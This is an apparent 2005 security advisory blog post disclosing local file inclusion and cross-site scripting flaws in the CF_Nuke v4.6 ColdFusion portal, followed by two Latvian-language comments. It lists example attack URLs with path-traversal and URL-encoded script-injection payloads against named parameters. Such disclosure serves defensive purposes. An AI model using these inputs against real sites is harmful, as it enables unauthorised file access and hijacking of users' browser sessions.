by r0t,der4444,cembo,VietMafia

Tuesday, December 06, 2005

CF_Nuke v4.6 Multiple vuln.

CF_Nuke v4.6 Multiple vuln.

Vuln. dicovered by : r0t
Date: 6 dec. 2005
vendor:http://www.mycfnuke.com/
affected version:v4.6 and prior

Product Description:

CF_Nuke is a free easy-to-setup & easy-to-use open source ColdFusion, community style web application. Offering greater control over web site maintenance, and increased performance over previous versions, CF_Nuke 4.6 is coming into it’s own as a stand-alone web portal similar to phpNuke.
Core Features - Links, News and Reviews, Favorite Quotations - Private Message System for Members - Downloads - Themes - Recommend to Friend - Site FAQ System - Keyword and Category search - Member Registration - Users can submit News, Reviews, Quotations & Links for approval - extensive Admin capabilities. Additional Modules (Forums. Photo Gallary, Shoutbox, RSS, Calendar, Who's Online, NewLetters, etc....) are being made available by our Awesome members.




Vuln. Description:


1) Input passed to the "sector" and "page" parameters in "index.cfm" isn't properly sanitised before being used to include ".cfm" files. This can be exploited to include arbitrary ".cfm" files that are accessible on the server.

Successful exploitation requires that "Sandbox Security" is not enabled for the directory.

2) Input passed to the "cat", "topic", and "newsid" parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Successful exploitation requires that "Global Script Protection" is disabled.




examples:
/index.cfm?sector=../local file

/index.cfm?sector=quotes&page=../local file


/index.cfm?sector=news&page=topic&topic=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=links&page=links&cmd=view
&cat=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?sector=news&page=read&newsid=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

Solution:
Look for more secure alternative.:)

2 Comments:

Anonymous Anonymous told...

jaaa forshi tik daudz ievainojamiibu jau saak izskatiities peec kkaada sec saita.. tikai laamem kursh nemaak lietot ievainojamiibas nav ko te dariit... :(

8:21 PM

 
Blogger r0t told...

Gan jau atliks laiks ja ne man tad kadam no maniem biedriem un uzrakstis latvieshu valoda par ievainojamibu izmantoshanu, kaut vai domaju ir kaut kas latvieshu valoda atrodams ieksh netsec.lv , bet vispar nets ir pilns ar rakstiem ka.. izmantot SQL vai XSS kash shaja bloga ir favorite*.

Neviens jau nevar uzminet ko juus velaties, dzivus piemerus nevar mees sheit likt, jo jau bloga pasha saakuma bija probelmas ar hostera deelj privatas infas un dziviem piemeriem.

8:35 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew